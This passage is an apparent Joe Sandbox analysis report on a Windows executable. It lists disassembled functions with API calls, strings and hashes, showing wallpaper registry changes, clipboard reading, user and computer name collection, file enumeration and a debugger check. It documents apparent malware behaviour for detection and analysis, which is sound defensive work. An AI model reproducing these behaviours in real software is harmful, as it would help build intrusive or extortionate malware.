String ID: C:\Users\user\Desktop\DB5rQYsfd6.exe$open
API String ID: 2825088817-2294821366
Opcode ID: 9279dac6bf6dd89e916ae4ad58f81462122a69ac66b806c492ba8f60ae407084
Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
Opcode Fuzzy Hash: 9279dac6bf6dd89e916ae4ad58f81462122a69ac66b806c492ba8f60ae407084
Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B

Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861

Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1

Strings

Control Panel\Desktop, xrefs: 0041A7A7, 0041A7DA, 0041A82A
TileWallpaper, xrefs: 0041A84B
WallpaperStyle, xrefs: 0041A7AC, 0041A7DF, 0041A82F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
Opcode Fuzzy Hash: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF

Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
_wcschr.LIBVCRUNTIME ref: 0044F02A
_wcschr.LIBVCRUNTIME ref: 0044F038
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769

Function 004468DC Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004468EC

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

GetTimeZoneInformation.KERNEL32 ref: 004468FE
WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A

Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
Opcode Fuzzy Hash: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58

Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004399A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 264085c365fd56cdaa9a81dec4e023ddb66b25e6f98bc4556e938571cf163858
Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
Opcode Fuzzy Hash: 264085c365fd56cdaa9a81dec4e023ddb66b25e6f98bc4556e938571cf163858
Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48

Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C

Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
ExitProcess.KERNEL32 ref: 004407EF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040A65D
GetClipboardData.USER32(0000000D), ref: 0040A669
CloseClipboard.USER32 ref: 0040A671

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: 280dd97dd44c7032fc56be9508286d69cfb3c10e1aaf4890c83757bb65daa123
Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
Opcode Fuzzy Hash: 280dd97dd44c7032fc56be9508286d69cfb3c10e1aaf4890c83757bb65daa123
Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE

Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3

Strings

, xrefs: 00432B5A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5

Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F

Strings

GetLocaleInfoEx, xrefs: 00445E37

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D

Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 6b2aab6702fec462d4856447b793dd0eb02a195510c2ec8c521fcd9ef870feb3
Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
Opcode Fuzzy Hash: 6b2aab6702fec462d4856447b793dd0eb02a195510c2ec8c521fcd9ef870feb3
Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A

Function 004195F8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000037,00471FFC), ref: 00419615
GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: c3d59dd80c111bba08e9f29d2cdeaf09f0919bffa6c13c010aba229284bd6ddb
Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
Opcode Fuzzy Hash: c3d59dd80c111bba08e9f29d2cdeaf09f0919bffa6c13c010aba229284bd6ddb
Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98

Function 0045050B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00450506,?,?,00000008,?,?,004533BD,00000000), ref: 00450738

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
Instruction ID: 84d157482befc24a690b5ca75d770a61b966f8e925af1348fa8ee8768c6acf08
Opcode Fuzzy Hash: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
Instruction Fuzzy Hash: C4B17B391106089FD714CF28C48AB657BE0FF48365F298659EC99CF2A2C339E996CF44

Function 004316FB Relevance: 1.8, Strings: 1, Instructions: 501COMMON

Download Yara Rule

Strings

0, xrefs: 00431707

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
Instruction ID: 320eb4b805cbc27e3b43fdc18f554f89df5109ee0a66c35b650df9f3f8f200d4
Opcode Fuzzy Hash: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
Instruction Fuzzy Hash: 031241326083008BD714DF65D852A1EB3E2BFCC758F194D2EF585A73A1DB74E8168B46

Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59

Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

EnumSystemLocalesW.KERNEL32(0044F2A3,00000001), ref: 0044F1ED

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
Opcode Fuzzy Hash: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744

Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
